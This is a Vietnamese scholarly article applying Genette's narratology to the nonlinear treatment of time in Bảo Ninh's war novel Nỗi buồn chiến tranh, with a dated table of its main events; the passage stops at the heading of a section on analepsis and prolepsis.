Thời gian tự sự trong Nỗi buồn chiến tranh (Bảo Ninh)

 

Thời gian tự sự trong Nỗi buồn chiến tranh (Bảo Ninh)

Lê Lưu Oanh – Nguyễn Đăng Tùng

Thời gian là một phương thức tồn tại của tác phẩm văn học. Tuy nhiên, thời gian chỉ thực sự trở thành một yếu tố nghệ thuật khi nhà văn ý thức được sâu sắc vai trò của nó trong tiến trình truyện kể: thời gian như một phương tiện nghệ thuật để bộc lộ ý đồ nghệ thuật của nhà văn trong việc nhận thức và phản ánh đời sống.

Nỗi buồn chiến tranh (Bảo Ninh) là một trong những tác phẩm thể hiện rõ sự cách tân tiểu thuyết Việt Nam trong thời kì đổi mới: “Nỗi buồn chiến tranh xứng đáng là một sự khai mở với văn phong, với cấu trúc mới mẻ khác rất nhiều những tác phẩm viết về chiến tranh trước nó” [48,107]. “Xét về mặt nghệ thuật đó là thành tựu cao nhất của văn học đổi mới” [43,177]. Tác phẩm nhận được giải thưởng Hội Nhà văn Việt Nam năm 1991 và giải thưởng Châu Á năm 2011.

Nỗi buồn chiến tranh là hồi ức của nhân vật chính (Kiên) về chiến tranh. Do tính chất hồi ức nên vấn đề thời gian ở đây được thể hiện rất đậm đặc. Thời gian trong tác phẩm là một dòng chảy bất thường, không có quy luật, phản ánh dòng tâm trạng rối bời, đầy những uẩn khúc của nhân vật. Kiểu trần thuật phi tuyến tính với những đảo lộn thời gian sự kiện, đồng hiện thời gian với thủ pháp dòng ý thức, lối kể đảo thuật, dự thuật… đã góp phần xác lập một cấu trúc thời gian trần thuật đặc thù cho tiểu thuyết Nỗi buồn chiến tranh.

Thời gian tự sự – “một nhân tố cấu trúc văn bản văn xuôi nghệ thuật”

Gérard Genette trong bộ ba “Phương thức tu từ” (1966, 1969, 1972) cho rằng: cấu trúc ngôn bản tự sự do ba lớp tạo thành: cốt truyện (histoire), truyện hay câu chuyện (Récit) và tự sự hay kể chuyện (Narration). Việc phân chia này nhằm làm nổi bật vai trò của một nhân tố có ý nghĩa quyết định trong cấu trúc truyện: thời gian. Nó còn là cơ sở cho Genette đề xuất quan niệm về ba trục thời gian trong cấu trúc truyện: trục thời gian lịch sử, trục thời gian tự sự trục thời gian phát ngôn.

Ở Việt Nam, các công trình nghiên cứu, khảo cứu, các chuyên luận, giáo trình lí luận văn học: “Dẫn luận thi pháp học” – Trần Đình Sử,  “Những vấn đề thi pháp của truyện” – Nguyễn Thái Hòa… cũng đã đề cập đến vấn đề thời gian tự sự trong thế giới nghệ thuật của tác phẩm. Đào Duy Hiệp (2008) trong công trình “Phê bình văn học từ lí thuyết hiện đại” đã nghiên cứu khá công phu về một số phương diện tự sự trọng yếu. Tác giả đã giới thiệu kĩ lưỡng về thời gian tự sự theo lý thuyết của Genette và vận dụng vào việc nghiên cứu một số tác phẩm của thế giới và Việt Nam. Tiêu biểu là: “Thời gian trong Đi tìm thời gian đã mất của Marcel Proust”; “Thời gian trong Don Quijote của Cervantés”; “Thời gian trong Chí Phèo của Nam Cao” hay “Thời gian trong Thân phận của tình yêu của Bảo Ninh”

 

TỔ CHỨC THỜI GIAN TỰ SỰ TRONG NỖI BUỒN CHIẾN TRANH

Văn học là nghệ thuật về thời gian. Yếu tố thời gian mà chúng ta quan tâm là thời gian mang tính nghệ thuật, là thời gian nằm trong văn bản, thời gian trong quan niệm của tác giả.

Nếu thi pháp học quan tâm chủ yếu đến thời gian của nhân vật, của những sự kiện diễn ra trong tác phẩm thì tự sự học quan tâm nhiều hơn đến thời gian của việc kể, tức là thời gian tự sự, vốn gắn liền với người kể chuyện. Lí thuyết tự sự học phân biệt rất rõ giữa thời gian trần thuật và thời gian được trần thuật. Theo Trần Đình Sử: “Mối tương quan giữa thời gian trần thuật và thời gian được trần thuật đã được các nhà hình thức Nga, Vưgôtxki phát hiện từ lâu. G. Genette có công lập ra công thức để phân tích như là một phép tu từ của trần thuật” [55,94].

Thời gian là một trong những nhân tố được Gérard Genette nhà tự sự học hàng đầu nước Pháp chú trọng. Nghiên cứu hai lớp thời gian trong truyện kể: thời gian của sự việc được kể và thời gian của truyện kể (thời gian của cái được biểu đạt và thời gian của cái biểu đạt), Genette đã có cách gọi khác khi tìm hiểu trong mối liên quan giữa chúng: thời gian cốt truyện/ sự kiện (thời gian lịch sử) và thời gian của truyện kể – thời gian giả (thời gian tự sự). Đây là hai loại thời gian cơ bản nhất mang tính nghệ thuật trong việc nghiên cứu. Trong loại thời gian: thời gian của truyện kể – thời gian giả (thời gian tự sự), Genette đã chia ra thành ba yếu tố nghiên cứu cơ bản: trật tự thời gian (order), tốc độ (speed) và tần suất (Frequency). Trong mỗi yếu tố thời gian trên, Genette lại chia nhỏ ra nghiên cứu tỉ mỉ về: sự sai trật ngày tháng (anachronie), đảo thuật (analepse), dự thuật (prolepse), tóm tắt (sommaire), quãng ngưng (pause), tỉnh lược (ellipse), lớp- cảnh (scène), đơn/xảy lặp (singulatif/ iterative)…

Thời gian tự sự (thời gian trần thuật – narrative time) chính là thời gian của truyện kể, “là thời gian của người kể, của sự kể. Nó có mở đầu và kết thúc, nó có tốc độ và nhịp điệu riêng do người kể có thể kể nhanh hay chậm. Nó có thể đem cái sau kể trước và ngược lại, đem cái trước kể sau” [56,81] (phân biệt với thời gian được trần thuật là thời gian của các sự kiện được kể  – thời gian “chuyện”). Đó chính là “thời gian của trật tự các sự kiện đã được phân bố lại trong truyện do sắp xếp chủ quan của người kể chuyện” [20,33]. Thời gian tự sự không tuân theo quy luật của thời gian vật lí mà đã được tái tạo lại bởi người kể chuyện. Giữa thời gian tự sự và thời gian sự kiện bao giờ cũng có một độ lệch nhất định nên Genette đã rất có lí khi xem thời gian tự sự, thời gian của truyện kể là thời gian giả (pseudo time).

Ba yếu tố thời gian tự sự của Genette: trật tự thời gian, tốc độ tần suất là những phương diện cơ bản nhất và cũng gần như hoàn thiện nhất về thời gian. Khảo sát thời gian trong tác phẩm tự sự theo hướng đề xuất của Genette, các nhà nghiên cứu có thể “bóc tách được các lớp thời gian, luận giải quan niệm thời gian, cách trần thuật, tư tưởng của tác giả” [21]. Bởi những đóng góp trên đây mà Genette được đánh giá là “người quyền uy nhất” [31,31] về thời gian tự sự.

Như chúng tôi đã đề cập ở trên, lý thuyết về thời gian tự sự của Genette bao gồm ba yếu tố: trật tự thời gian, tốc độ tần suất.

Trật tự thời gian

Trật tự thời gian (order) chỉ ra mối quan hệ “giữa trật tự thời gian kế tục các sự kiện trong sự nói đến và trật tự thời gian giả của sự trình bày chúng” [16,114]. Nếu câu chuyện tuần tự diễn ra theo thời gian biên niên thì thời gian tự sự và thời gian sự kiện hoàn toàn trùng khít. Tuy nhiên, trong truyện kể, trình tự thời gian này thường có nhiều biến đổi khiến thời gian tự sự và thời gian sự kiện hiếm khi trùng khít với nhau. Vì vậy, thời gian tự sự không còn là thời gian biên niên của đời sống, không còn trung thành với thời gian sự kiện, Genette gọi đây là thời gian giả (pseudo time). Giữa thời gian tự sự và thời gian sự kiện  bao giờ cũng có một độ lệch nhất định. Khoảng cách được tạo nên bởi độ lệch ấy được Genette gọi là thời sai (anachrony) – sự sai biệt thời gian giữa: thời gian của chuyện (thời gian sự kiện) và thời gian truyện (thời gian tự sự).

Độ lệch giữa thời gian sự kiện và thời gian tự sự trong truyện kể (thời sai) được biểu hiện ở hai dạng cơ bản: “các sự kiện vốn xảy ra trước thời điểm “hiện tại” của câu chuyện được gọi là đảo thuật (analepse); kể trước các sự kiện vốn diễn ra sau thời điểm “hiện tại” của câu chuyện được gọi là dự thuật (prolepse)” [52,17- 18].

Chúng tôi sẽ tập trung vào một số vấn đề nghệ thuật quan trọng về trật tự thời gian sau đây trong Nỗi buồn chiến tranh: thời gian niên biểu, sự sai trật niên biểu, lối đảo thuật và dự thuật.

 Những dấu ấn thời gian niên biểu trong Nỗi buồn chiến tranh:

Toàn bộ câu chuyện trong Nỗi buồn chiến tranh là quá khứ của đời sống hiện tại. Câu chuyện kể về tình yêu và cuộc chiến tranh của nhân vật chính – Kiên (từ khi anh 17 tuổi đến lúc ngoài 40 tuổi).

Do vậy, thời gian cốt truyện của tác phẩm tính từ năm 1965 đến đầu những năm 90 của thế kỉ XX: khoảng trên dưới 25 năm.

Nỗi buồn chiến tranh được thêu dệt nên bởi hàng loạt những giấc mơ đứt nối, những hồi tưởng gấp khúc, hỗn loạn của nhân vật chính tên Kiên – một người lính – nhà văn, nhưng ta vẫn có thể thống kê được những biến cố, sự kiện chính được trình bày trong toàn bộ cốt truyện về: tình yêu thủa học trò; cha mất Kiên vào bộ đội; chiến tranh và những cuộc chiến đấu; những hi sinh mất mát; Kiên gặp lại Phương sau mười năm xa cách; sự ra đi của Phương cùng một người đàn ông khác; Kiên tham gia vào đội thu nhặt hài cốt tử sĩ; Kiên trở thành nhà văn; cuốn tiểu thuyết đang dần hình thành; Kiên bỏ đi; những con người xung quanh…

Có thể coi đó là cốt truyện “nổi” – niên biểu bên ngoài trên một cốt truyện “chìm” – niên biểu bên trong ngầm chảy quan trọng khác: đời sống tâm linh, những hồi ức, mộng tưởng… Nỗi buồn chiến tranh, do đó đã mặc nhiên có song song hai thời gian niên biểu: trên bề nổi với những chỉ dẫn cụ thể về năm tháng (niên biểu bên ngoài) và dưới bề sâu (niên biểu bên trong) là niên biểu thời gian trải nghiệm, thời gian tâm linh.

* Niên biểu bên ngoài mang tính chất lịch sử rõ rệt (còn gọi là thời gian lịch sử – temps historique) là ở những chỉ dẫn năm tháng cụ thể. Chúng tôi đã tiến hành khảo sát và thống kê những dấu hiệu thời gian trong Nỗi buồn chiến tranh theo thứ tự xuất hiện của chúng trong tác phẩm.

– Có khi là những chỉ dẫn bằng năm tháng cụ thể: Mùa khô đầu tiên sau chiến tranh năm 1976; cuối mùa khô năm 1969; mùa khô năm 1967; đầu mùa mưa năm 1969; mùa hè năm 1965; mùa mưa năm 1974; từ hồi đầu 73 tới giờ; cuối tháng chạp năm 1972; thuở 65 đầu thời đánh Mĩ; mùa thu năm 1965; Mậu Thân năm 1968; cuối mùa thu năm 1976; cuối tháng 8 năm 1974; mùa thu tháng 9 năm 1974; mùa xuân năm 1965

– Có khi là bằng mùa trong năm: người ta kể rằng mùa xuân năm ấy; mùa hè những năm Kiên vào bộ đội; buổi chiều cuối xuân đầu hạ; những đêm xuân giá rét; một tối nọ mùa hè; cuối mùa thu năm 1976; vào một mùa hè cách đây đã dăm năm; cuối mùa hạ vừa rồi; Phương bỏ ra đi từ đầu mùa đông; mùa mưa năm ngoái; mùa khô đầu tiên sau chiến tranh

– Thời gian còn được thông báo bằng buổi: một chiều nọ; chiều hôm ấy; buổi chiều tháng tư; buổi trưa ngày hôm qua đó thôi; buổi chiều cuối xuân; kí ức về một buổi trưa; kí ức về một buổi chiều mùa hè sau chiến tranh; cuối buổi chiều hôm Can bỏ trốn; sáng hôm sau

Đặc biệt, thời gian đêm và những từ ngữ chỉ bóng tối, bóng đêm xuất hiện với mật độ dày đặc như nhấn chìm, bao trùm toàn bộ tiểu thuyết. Theo kết quả khảo sát của tác giả Nguyễn Thị Thanh Xuân thì “số lần xuất hiện từ đêm trong tiểu thuyết là 224 lần” [71,60] trên tổng số 312 trang của tác phẩm với: bóng đêm; đêm ác mộng; đêm trường; đêm âm u; đêm kì ảo; đêm hương hoa; đêm thác loạn; đêm hai mươi năm trước; cái đêm xa xăm ấy; một đêm nọ từ quán rượu ra; phố xá tối câm; qua sân ga tối om; tối khuya; bóng tối cuồn cuộn trên các sườn dốc

– Dấu hiệu thời gian còn được thể hiện qua độ chiếu của mặt trời, mặt trăng: mờ mờ ánh trăng; vừng trăng bị mây nuốt; trăng ló khỏi mây vạch một vạch sáng lóng lánh; vành trăng lướt thoáng một dải sáng trên mặt hồ và bãi cỏ; Kiên nhận thấy trăng hạ tuần đã lộ; vừng trăng mỏng và cong hiện ra rất nhanh ở rìa một khối mây đùn cao trên đỉnh hồ.

– Thời gian còn được thể hiện qua tuổi tác của nhân vật (thời thơ ấu vô cùng hạnh phúc và vô cùng buồn đau trước chiến tranh; nghĩ

lại tuổi thơ, nhớ đến cha bao giờ Kiên cũng thấy ân hận; mùa đông ấy anh vừa mười bảy tuổi; năm nay đã tứ tuần rồi; cái tuổi mười bảy; thời thơ ấu;“cố” Dụ đã qua đời – thọ chín mươi bảy tuổi; Phương mười sáu tuổi mẹ nàng về hưu; Phương tròn mười bảy tuổi thì cha Kiên qua đời; bây giờ Kiên và Phương mới mười sáu tuổi vừa học xong lớp chín).

– Đôi khi, thời gian còn được gợi lên từ các đặc trưng thiên nhiên (mây, mưa – xuất hiện 104 lần với: mùa mưa xanh ngát; mùa mưa ê ẩm; mưa phùn ban mai; mưa ngày mưa đêm; mưa giăng mờ mặt phố; mưa vỗ ràn rạt trên mái hiên; xác quân thù ướt mèm nước mưa…), hay từ các dấu hiệu thời gian lịch sử (trận Plây-cần năm 1972; mùa khô năm 72 thời sau hiệp định; trước ngày hành quân xuống cánh Nam tiến đánh Buôn Ma Thuột; hồi đầu hòa bình; sau chiến tranh, mùa khô năm 1966; chiến dịch Đông Sa Thầy; cuộc tấn công Mậu Thân năm 1968; thời sau hiệp định).

– Đặc biệt, có thể thấy rất rõ về niên biểu của người kể chuyện: dù sao thì cũng mới chỉ có hai mươi tám năm sống trên đời; ngay cái tuổi bốn mươi ngày nào xa lạ và khó tin biết mấy cũng chỉ còn lại nốt mùa đông này; mùa đông ấy anh vừa mười bảy tuổi… Trước hoặc sau những cụm từ này là những chỉ dẫn rất cụ thể về năm tháng.

– Ngoài ra, có rất nhiều những chỉ dẫn bất chợt về thời gian mang tính chất ngẫu nhiên của kí ức: đã lâu lắm rồi; hôm đó; thời ấy; hồi ấy; hồi đó; năm ấy; chiều hôm ấy; buổi tối hôm đó; một tối nọ; đêm ấy; cách đây không lâu; mấy hôm ấy; ngày trước; bẵng đi một thời gian… Những cụm từ chỉ thời gian này chủ yếu nằm ở phần đầu mỗi đoạn văn và bắt đầu cho một sự kiện. Nó tạo nên sự trùng điệp của kí ức và cũng là “giai điệu” đặc trưng cho Nỗi buồn chiến tranh.

       * Niên biểu bên trong là đời sống nội tâm của nhân vật với sự ám ảnh của “những giấc mơ nối chuỗi, mịt mờ, triền miên, vô định”  “những ý nghĩ không có điểm kết thúc”; “những kí ức xa vời, trập trùng và lặng lẽ, khắc nghiệt và thẳm sâu” … Chính những ẩn ức này khiến câu chuyện có nhiều bước rẽ, đột biến, tạo nên sự sai trật niên biểu trong tác phẩm. Tác giả tiểu thuyết Nỗi buồn chiến tranh, một cách có chủ ý, đã đảo lộn trật tự biên niên, phá vỡ cấu trúc thời gian tuyến tính để phù hợp với trật tự của hồi ức, kỉ niệm và thế giới những giấc mơ của nhân vật.

* Thời gian văn bản Nỗi buồn chiến tranh trải dài 312 trang cho một cốt truyện 25 năm, như vậy con số trung bình là 312 : 25 = 12,48 trang/ năm. Nhìn vào con số này, ta thấy tốc độ truyện kể khá chậm. Chính từ tốc độ truyện kể này đã tạo cho nhịp kể của truyện một tính chất hồi cố, trăn trở. Tuy nhiên, thời gian của việc kể chuyện trong mỗi trường đoạn cụ thể lại có những nhịp điệu và tốc độ khác nhau do những thủ pháp thời gian khác nhau quy định.

Dưới đây, chúng tôi sẽ đi sâu phân tích về việc bố trí các sự kiện của truyện theo sự sai trật niên biểu, lối đảo thuật dự thuật.

 Sự sai trật niên biểu trong Nỗi buồn chiến tranh

Nếu kiểu trần thuật theo thời gian tuyến tính chiếm ưu thế trong tiểu thuyết trước 1975 thì ở tiểu thuyết đương đại nói chung, Nỗi buồn chiến tranh nói riêng, kiểu trần thuật phi tuyến tính với sự sai trật niên biểu trở nên phổ biến hơn.

        Thời gian trong tác phẩm không được trình bày theo tiến trình thời gian cốt truyện/ sự kiện (thời gian lịch sử) mà luôn có sự đảo lộn, đứt gãy, xáo trộn không ngừng. Qua việc khảo sát, chúng tôi lập ra bảng thống kê sự sai trật niên biểu (anachronie) trong tác phẩm với các mốc sự kiện, thời gian tiêu biểu:

Bảng 1.1

Bảng thống kê các sự kiện chính trong Nỗi buồn chiến tranh (Bảo Ninh)

STT Thời gian Sự kiện chính Trang
1 Mùa khô

đầu tiên

sau

chiến tranh

(1976)

Kiên trong đội thu nhặt hài cốt tử sĩ ở

miền hậu cứ Cánh Bắc của mặt trận B3

và nghỉ lại ở truông Gọi Hồn.

  9- 10
2 Cuối năm

1969

Tiểu đoàn 27 bị tiêu diệt, chỉ có Kiên và

một vài người sống sót, cái truông núi

vô danh từ đấy có tên là Gọi Hồn.

 11- 12
3 Mùa mưa

8/ 1974

– Kiên cùng đám lính trinh sát lập bàn thờ cúng giỗ cho các linh hồn trong truông.

– Ven các cánh rừng ở truông Gọi Hồn,

hoa hồng ma nở rộ. Hương thơm của loài

hoa đã gây ra một ảo giác mộng mị cho

Kiên và lính trinh sát.

 13- 22
4 Mùa thu

9/1974

Chiến sự lớn ở Kông Tum. Can – người

đồng đội của Kiên đã chết vì trốn trại.

Cũng từ đây, Kiên có biệt danh là

“Thần Sầu”.

 22- 33
5 Mùa mưa

8/ 1974

ở truông Gọi Hồn diễn ra câu chuyện tình:

mông muội, bi thảm của các lính trinh sát

với ba cô gái. Kí ức của Kiên ngược trở về

với hình ảnh Phương.

 33- 55
6 1968 Hòa – cô giao liên dũng cảm đã hi sinh

để cứu Kiên và đồng đội.

 57- 59
7 Khoảng cuối

những

năm 80

Kiên trở thành nhà văn, dành mọi

tâm huyết để viết lên cuốn tiểu thuyết

về cuộc chiến tranh vừa qua.

 

60 – 64

8 Mùa đông

1965

Kiên đến Chèm thăm Dượng

(người chồng sau của mẹ) trước khi

lên đường đi B.

 70 – 73
9 Khoảng

cuối

những

năm 80

Nhiều chuyện bi hài diễn ra hàng ngày

trong ngôi nhà chung cư Kiên đang sống.

 

74 – 76

10 Mùa đông

1976

– Trên chuyến tầu xuất ngũ ra Bắc,

Kiên gặp Hiền (thương binh, người

Nam Định). Giữa họ có một mối

đồng cảm sâu sắc.

– Trở về Hà Nội, Kiên gặp lại Phương sau

mười năm cách xa, họ yêu nhau trong

đau khổ và xa cách.

 95-

104

11 Mùa khô

1976

– Tổ thu gom hài cốt tử sĩ đào trúng một

ngôi mộ kết ở thung lũng Mo Rai

bên bờ Sa Thầy.

– Chuyện Phán kể về cái chết của

tên Ngụy, khiến anh ta luôn sống trong

day dứt.

111-

114

12 Mùa khô

1966

Cái chết bi thảm của Quảng – người

đồng đội của Kiên đã để lại trong anh

ấn tượng mạnh mẽ về sự thảm khốc

của chiến tranh.

115-

116

13 Mùa khô

1976

Đội thu nhặt hài cốt tìm thấy người điên ở

đồi 300 bên bờ sông Sa Thầy, phỏng đoán

Tùng – đồng đội của Kiên bị một viên bom

lọt vào não làm cho mất trí. Hình ảnh những

người điên làm Kiên và đồng đội

buồn thương da diết.

116-

122

14 30/4/1975 – Cảnh lính tráng ăn uống, xả hơi sau

chiến thắng.

– Chuyện xác chết của người đàn bà ở

cửa Hải quan sân bay Tân Sơn Nhất bị

hành hạ khiến Kiên nhớ đến cái chết của

Oanh ở ty cảnh sát Buôn Ma Thuột

cách đó hơn một tháng.

123-

128

15 Khoảng cuối

những năm

1980

– Kiên tiếp tục viết bản thảo cuốn tiểu thuyết.

Những lúc say, anh lại tìm đến người

đàn bà câm sống ở tầng áp mái trong

khu nhà của anh để kể với chị những gì

mình viết.

– Vào một đêm cuối mùa đông, trước khi bỏ đi,

Kiên định cho cả chồng bản thảo vào

lò lửa nhưng người đàn bà câm đã kịp thời

ngăn lại. Sau khi Kiên bỏ đi, chị đã giữ

chồng bản thảo ấy.

134-

144

16 Mùa thu

1965

– Buổi mít tinh “Ba sẵn sàng” của trường

Bưởi, Kiên và Phương đã trốn ra bơi ở

Hồ Tây.

– Nhà ga Thanh Hóa sau trận mưa bom, hôm Phương tiễn Kiên đi B. Lần đầu tiên Kiên

thấy người bị giết, thấy sự dã man của

chiến tranh.

148-

149

17 1968 – Kiên nhớ lại trận giáp lá cà dưới chân

Ngọc Bơ Rẫy – những ngày tháng

khổ đau của chiến trường Tây Nguyên

hung tàn.

– Cảnh Kiên và Tạo “voi” quỳ lên khẩu

Mã Lai xả súng vào dòng thác tàn binh ngụy

. Tạo đã hi sinh trong thời khắc đó.

150-

152

18 Mùa xuân

1965

Cha mất, Kiên lầm lì cô độc. Phương bước

sang tuổi 17 với sắc đẹp rực cháy

sân trường Bưởi.

154-

174

19 Đầu năm

1969

Kiên bị thương nặng nằm ở Điều trị 8.

Trong cơn mê tỉnh, anh đã nhầm gương mặt

cô y tá câm với gương mặt Phương.

 175-

179

20 1961 Kiên, Phương, Toàn, Sinh được bác Huynh

cho đi tầu điện. Phương đã thể hiện tình yêu

trẻ con nhưng vô cùng mãnh liệt với Kiên.

204-

208

21 Mùa  thu

1965

Gặp Phương trước khi vào Nam đi B, Kiên

đã nhỡ đơn vị, cùng Phương lên tàu vào ga

Thanh Hóa.

209-

226

22 8/1964 Đoàn trường Chu Văn An tổ chức cắm trại

ở Đồ Sơn, chiến tranh Mỹ bỏ bom. Từ đây,

bắt đầu nhen nhóm những sự kiện ghê gớm

trong đời Kiên.

228-

231

23 Mùa hè

1965

Kiên vào bộ đội.   232
24 Mùa thu

1965

Chuyến tàu đêm, Phương tiễn Kiên

lên đường đi B.

232-

234

25 Mùa đông

1965

Đoàn tàu bị bỏ bom, Kiên lạc mất Phương. 236-

240

26 30/4/1975 – Từ hi sinh vì sự chần chừ của Kiên

khi tấn công vào dãy lầu Lăng Cha Cả.

– Nhớ đến những đồng đội Oanh,

Cừ, Thịnh “nhớn” và Hòa đã hi sinh

bởi sự sống của Kiên và bao người khác.

241-

259

27 Đầu năm

1964

Cuộc trò chuyện giữa Kiên với

mẹ Phương và những lo lắng của bà

cho cuộc đời Phương.

269-

271

28  

Mùa đông

1965

– Kiên đến chào từ biệt mẹ Phương.

– Phương đàn tặng Kiên một bản Xô nát

để tiễn anh ra trận. Kiên vô cùng xúc động.

272-

273

29  

Mùa thu

1965

Cuộc chạm mặt chiến tranh đầu tiên

của Kiên và Phương trên toa tầu hàng đã

để lại một vết thương lòng lớn. Kiên

quyết định ra đi, bỏ lại Phương ở Thanh Hóa,

từ đó bặt tin Phương.

274-

308

 

30

 

1973

Kiên nhận được thư của Kì “tổ ong” từ

mặt trận khu V, thanh minh cho Phương.

Lá thư làm sống dậy trong Kiên niềm

hi vọng về Phương.

 

309-

311

 

31

Khoảng

những

năm 90

Kiên “từ bỏ khu phố này” với gian phòng

bừa bộn và một chồng bản thảo dang dở,

người đàn bà câm sống ở tầng áp mái đã

giữ chồng bản thảo ấy…

 

313-

320

 

Qua khảo sát Nỗi buồn chiến tranh, chúng tôi đã thống kê được 31 sự kiện chính (hoặc biến cố gây tác động đến tâm trạng và tình cảm nhân vật Kiên) ứng với các mốc thời gian cụ thể. Tất nhiên, việc khảo sát này chỉ mang tính tương đối nhưng nó đã cho chúng ta thấy được số lượng các sự kiện bao trùm miền kí ức của Kiên.

Nhìn vào bảng thống kê sự sai trật niên biểu trong tác phẩm, chúng ta thấy dòng hồi ức của Kiên không tuân theo quy luật của tư duy logic mà theo dòng chảy tự nhiên của tình cảm, tâm trạng nhân vật. Do vậy, thời gian trong trong tác phẩm cũng không tuân theo trật tự tuyến tính mà luôn có sự đảo lộn, đứt gãy, xáo trộn không ngừng. Trong tiểu thuyết truyền thống, ta thường gặp cách kể chuyện theo kiểu “hồi cố”, tức người kể đứng ở thì hiện tại nhìn về quá khứ (từ quá khứ xa đến quá khứ gần) rồi lại trở về với hiện tại. Có thể tóm tắt sự vận động của kiểu thời gian này thành công thức:

+ quá khứ xa   →   quá khứ gần   →  hiện tại

+ hiện tại     →    quá khứ     →    hiện tại

(nhớ lại)              (trở về)

Nhưng tiểu thuyết Nỗi buồn chiến tranh không đi theo mạch vận động thông thường đó, các lớp thời gian quá khứ – hiện tại chất chồng, lồng ghép, đan xen; những mảng quá khứ hiện về không theo trật tự tuyến tính, không vận động theo trình tự từ quá khứ xa đến quá khứ gần mà lồng ghép trập trùng tạo nên nhiều lớp hiện thực chồng chéo trong dòng suy tưởng nặng trĩu buồn đau của nhân vật. Lẽ ra, theo tiến trình thời gian lịch sử thì cuộc đời Kiên phải bắt đầu từ sự kiện năm 1961 (Kiên 13 tuổi), nhưng theo dòng hồi ức thì sự kiện đầu tiên lại là mùa khô đầu tiên sau chiến tranh – 1976: Kiên trong đội thu nhặt hài cốt tử sĩ ở truông Gọi Hồn (Kiên đã 28 tuổi). Từ đó, câu chuyện đột ngột đưa người đọc trở lại những thời điểm trước đó: 1969; 8/1974; 9/1974; 8/1974; 1968; khoảng cuối những năm 80; 1965; khoảng cuối những năm 80; 1976; 1966; mùa khô 1976; 30/4/1975; khoảng cuối những năm 80; mùa thu 1965; 1968; mùa xuân 1965; 1969; 1961; mùa thu 1965…

Chúng ta thấy, các mốc thời gian quá khứ, hiện tại đan xen chồng chéo, có quá khứ gần, quá khứ xa đan cài vào nhau, thậm chí có khi được hiện tại hóa, tạo thành một thứ thời gian đồng hiện đưa đến cho người đọc cảm giác về sự lộn xộn trong ý thức – biểu hiện của một trạng thái tinh thần bất ổn ở hiện tại. Người đọc muốn hiểu được diễn biến của cốt truyện, muốn nắm bắt được mạch vận động của thời gian truyện, phải tháo rời các sự kiện trong thời gian tự sự rồi sắp xếp, lắp ghép chúng lại với nhau theo tiến trình logic tuyến tính: từ mốc khởi đầu khi Kiên 13 tuổi (1961); đầu năm 1964; 8/1964; mùa xuân 1965; mùa hè 1965; mùa thu 1965; mùa đông 1965; 1966; 1968; đầu năm 1969; cuối năm 1969; 1973; 8/1974; 9/1974; 30/4/1975; 1976; khoảng cuối những năm 80; khoảng những năm 90.

Một đặc điểm nữa mà chúng ta dễ dàng nhận ra từ bảng thống kê sự sai trật niên biểu trong tác phẩm đó là: thời gian quá khứ ám ảnh, chiếm ưu thế so với thời gian hiện tại. Những thời khắc của thì hiện tại (cuối những năm 80; khoảng những năm 90) chỉ thoáng xuất hiện trong những giây phút chợt tỉnh của nhân vật, rồi lại nhanh chóng chìm đi trong những giấc mộng về quá khứ. Theo kết quả khảo sát của chúng tôi, trong Nỗi buồn chiến tranh có tới 141 từ chỉ dẫn về thời gian quá khứ, trong đó từ “hồi” kết hợp với chỉ từ “ấy”, “đó” chiếm đa số. Ngoài ra, tác giả còn sử dụng nhiều từ chỉ dẫn thời gian quá khứ khác như: “bấy giờ”, “cái đêm xa xăm ấy”, “buổi tối hôm ấy”, “năm ấy”… Và nhân vật Kiên có tới 68 lần dùng động từ “nhớ” với nghĩa là “nhớ lại”. Trong khi đó thời gian hiện tại chỉ có khoảng 77 từ (“bây giờ”, “năm nay đã tứ tuần rồi”…). Cuốn tiểu thuyết chính là cuộc hành trình về với những kỉ niệm, đi tìm lại “thời gian đã mất” của nhân vật.  quá khứ trở thành nỗi ám ảnh, day dứt bao trùm lấy hiện tại và chiếm lĩnh cả tương lai. Kiên tự ví cuộc đời mình như “con thuyền bơi ngược dòng sông không ngừng bị đẩy lui về dĩ vãng” .  một người không sao hòa nhập được với hiện tại vì chỉ tìm thấy ý nghĩa tồn tại ở quá khứ.

Trong cấu trúc thời gian như đã chỉ ra ở trên, chúng tôi còn nhận thấy: các mốc thời gian quá khứ: 1965, 1974, 1976 ngưng đọng và xuất hiện trở đi trở lại nhiều lần trong dòng hồi tưởng của nhân vật. Bởi vì, các mốc thời gian ấy xảy ra rất nhiều sự kiện trong cuộc đời của Kiên, sự kiện nào đối với anh cũng là bước ngoặt lớn lao. Đặc biệt là mốc thời gian năm 1965 (Kiên 17 tuổi) – như một dấu gạch nối cho cuộc đời của Kiên với biết bao những biến cố thăng trầm: cha mất, người thân duy nhất của anh không còn, và cũng là năm anh tốt nghiệp lớp 10 rồi vào bộ đội; Phương tiễn Kiên trên chuyến tàu “định mệnh” vào ga Thanh Hóa và lần đầu tiên anh thấy sự tàn bạo của chiến tranh; đoàn tàu bị bỏ bom, Kiên lạc mất Phương rồi từ đó bặt tin Phương… Từ chỗ đang có tất cả: có một gia đình bỗng nhiên Kiên trở nên bơ vơ cô độc; từ một học sinh trường Bưởi hào hoa trở thành lính chiến xông pha nơi trận mạc; tình yêu đang nồng nàn thì phải chia li; người con gái trong trắng, đằm thắm mà anh hằng yêu dấu cũng bỗng trở thành người đàn bà xa lạ, thác loạn đang hủy hoại chính mình… Cho nên, dòng hồi ức của Kiên về quãng thời gian ấy để lại ấn tượng sâu sắc không bao giờ phai nhạt trong miền kí ức của Kiên. Nó như một vết thương lòng trong tâm hồn luôn rỉ máu!

Từ bảng thống kê về sự sai trật niên biểu trong Nỗi buồn chiến tranh, ta có thể rút ra kết luận: cuốn tiểu thuyết là một chuỗi những hồi tưởng của Kiên về cuộc chiến khắc nghiệt. Mặc dù sống trong hiện tại nhưng tâm hồn anh luôn trở về với quá khứ, sống trong hoài niệm với những kí ức về chiến tranh, tình yêu, Hà Nội… dẫn đến sự “vi phạm” thường xuyên đến dòng chảy tự nhiên của thời gian niên biểu, tạo nên sự sai trật niên biểu trong tác phẩm. Đặc điểm này chi phối đến nghệ thuật kể chuyện, tạo ra một kiểu thời gian đa tầng, chồng chéo, đan xen. Thời gian có sự đi về giữa hiện tại và quá khứ, còn quá khứ là những câu chuyện hỗn độn nhiều khi lồng ghép vào nhau tạo nên kết cấu “truyện lồng trong truyện”.

 Lối đảo thuật và dự thuật

